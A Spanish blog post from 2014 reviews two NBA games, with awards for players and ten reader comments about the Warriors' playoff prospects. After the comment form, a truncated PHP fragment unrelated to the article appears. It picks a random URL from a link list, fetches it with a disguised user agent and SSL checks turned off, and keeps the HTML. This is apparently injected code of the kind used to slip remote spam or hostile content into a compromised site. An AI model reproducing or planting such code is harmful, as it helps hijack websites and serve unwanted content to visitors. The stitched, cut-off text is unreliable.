La Crónica: Jueves descafeinado

07 de February de 2014 por txusma

Los jueves son noches de duelos en la cumbre, espectáculo, emoción, talento a raudales… ¡Cómo fastidia que las lesiones no te permitan disfrutar de un buen espectáculo!

Los Nets endosaron más de 100 puntos a los Spurs después de casi 14 años. Desde marzo de 2000 en todos los enfrentamientos se habían quedado por debajo de la centena pero ayer se encontraron con la ocasión perfecta. Los tejanos se presentaron al partido sin Tony Parker, Kawhi Leonard, Manu Ginobili, Boris Diaw ni Tim Duncan y los Nets no sudaron demasiado para contrarestar el impulso inicial de los no habituales de los Spurs y acabar llevándose el partido con comodidad (89-103).

En la bahía se mascó la tragedia durante la primera parte. Los Warriors perdían de 16 puntos ante Chicago al inicio del segundo cuarto y lo peor era que estaban ofreciendo una imagen de apatía que no tenía nada que ver con lo que transmitía el equipo a principios de temporada. Stephen Curry se echó el equipo a las espaldas y con prácticamente la única ayuda de Klay Thompson en ataque, consiguió remontar el partido y acabar ganando cómodamente a unos Bulls que también estuvieron bastante espesos (87-102). El duelo estuvo marcado también por las ausencias. David Lee, Andrew Bogut no se vistieron de corto por culpa de unas molestias y Carlos Boozer se lesionó durante el calentamiento. 

PREMIOS

MVP: Stephen Curry fue el más destacado de largo de la noche. Sus 34 puntos y 9 asistencias fueron vitales para que los Warriors se llevaran la victoria. Fue el único que escapó de la indolencia general.

Sorpresa: Las lesiones permiten que jugadores menos habituales disfruten de minutos. Fue el caso de Cory Joseph que en 35 minutos anotó 18 puntos y robó 4 balones. Alan Anderson anotó 22 puntos

Decepción: Esta vez DJ Augustine no fue el factor X de los Bulls. Se quedó en 10 puntos y no aportó prácticamente nada más.

Esfuerzo en vano: Como siempre, Taj Gibson cumplió en ausencia de Carlos Boozer. Acabó con 26 puntos, 13 rebotes, 4 asistencias, 2 robos y 2 tapones. De todas maneras, más “solo ante el peligro” se encontró Danny Green. Respondió con 17 puntos, 8 rebotes, 3 asistencias y 2 tapones pero no fueron suficientes.

Comenta

10 comentarios a esta entrada

  1. Pop dice:
    #1

    Cuando he leído el Box esta mañana y he visto la baja de Diaw, “food poisoning”, me he partido. Entiendo que será “intoxicación alimentaria”, pero la traducción libre de “comida envenenada” me ha saltado al cerebro. I love NBA.

      Citar

  2. Chipi dice:
    #2

    A las 5, con todo el madrugón, yo he leído “foot poisoning”, hasta que se me han solidificado las meninges y ya lo pillé.

      Citar

  3. Sancho88 dice:
    #3

    Nunca habrá un DNP más clarificador que el OLDER que le dedicaron a Timmy Duncan hace un par de temporadas. Estaría bien que fueran más claros con los DNPs. Por ejemplo, el de Andre Miller, en vez de personal reasons, sería huevitis reasons, y los REST de Duncan ahora deberían ser FUCK YOU TNT personalmente dedicados por Greg Popovich. A ver, los que hacen el calendario no se dan cuenta de la movida? Yo no pondría a los Spurs ningún partido en jueves a estas alturas. Encima que no los ve nadie, Popo intenta que cada día los vea menos gente. Un desastre

      Citar

  4. R1Molano dice:
    #4

    El primer cuarto de GSW fue malo a rabiar, falta de intensidad y a Chicago le entraba casi todo, pero luego el segundo cuarto se gana a base de huevos liderados por Draymond Green y el talento de Curry (bien Thompson, primera vez en febrero que se presenta a jugar) a base de jugar 5+0 con Green en el supuesto C.
    A mi DJ Augustin no me disgusto en la primera parte.

      Citar

  5. Sancho88 dice:
    #5

    Molano, poco IQ hay en los Warriors. En playoffs los van a barrer. Objetivamente, juegan bastante mal comparados con Spurs, Indiana, etc. No hay compañerismo. Lo siento pero es lo que vi ayer. Quería ver otra cosa pero vi un equipo egoísta lleno de chupones. No tengo nada claro que Iguodala esté aportando nada al equipo. Un timo ese contrato.

      Citar

  6. Viva_Dirk dice:
    #6

    Iguodala estaba jugando muy bien hasta la lesión, desde que ha vuelto lo esta haciendo muy mal. Ayer sin el juego interior titular no es para juzgar nada, aunque coincido en que esperaba mas de ellos.

    Yo no los querría en playoffs, Curry es demasiado bueno para pensar que no te la va a liar, Bogut-Lee sanos complican la vida a cualquiera, y el resto tiene calidad. Habrá que ver si pueden dar ese plus en defensa que exige la post temporada.

      Citar

  7. Sancho88 dice:
    #7

    Luego Harrison Barnes decepcionante, no se esperaba ese estancamiento de él. Está ansioso y errante. Y Klay es un tirador chupón sin más, como hay otros muchos en la liga. Bogut el mejor en defensa, y Lee porque es un jugador imprescindible para este equipo. Desde el banquillo se agradece el soplo de aire fresco de Crawford, que al menos los espabila cuando están dormidos, Green lo intenta pero es un paquete sin más, y Speights me da a mí que no tiene la cabeza muy bien puesta. No sé, cuando Curry está inspirado puede pasar cualquier cosa, pero dependen demasiado de él. En Playoffs con defensas fuertes son carne de primera ronda o semifinales como el año pasado. No se ve aparentemente que puedan llegar más allá. Son un equipo similar a Houston, no les veo opciones al anillo por ningún sitio

      Citar

  8. Sancho88 dice:
    #8

    Y Jermaine da una pena terrible. Espero que deje el baloncesto para no arrastrarse de manera tan lamentable por las canchas

      Citar

  9. oli dice:
    #9

    Pues yo espero que os equivoqueis jeje, porque es el equipo que cuando esta enchufado más me transmite y el que más me gusta ver jugar, y en playoffs seguro que dan un plus en defensa, eso si si tocan thunder o spurs veo muy chungo pasar, contra el resto tenemos opciones de clasificarnos.

      Citar

  10. Sancho88 dice:
    #10

    oli, contra Clippers, Thunder y Spurs imposible

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>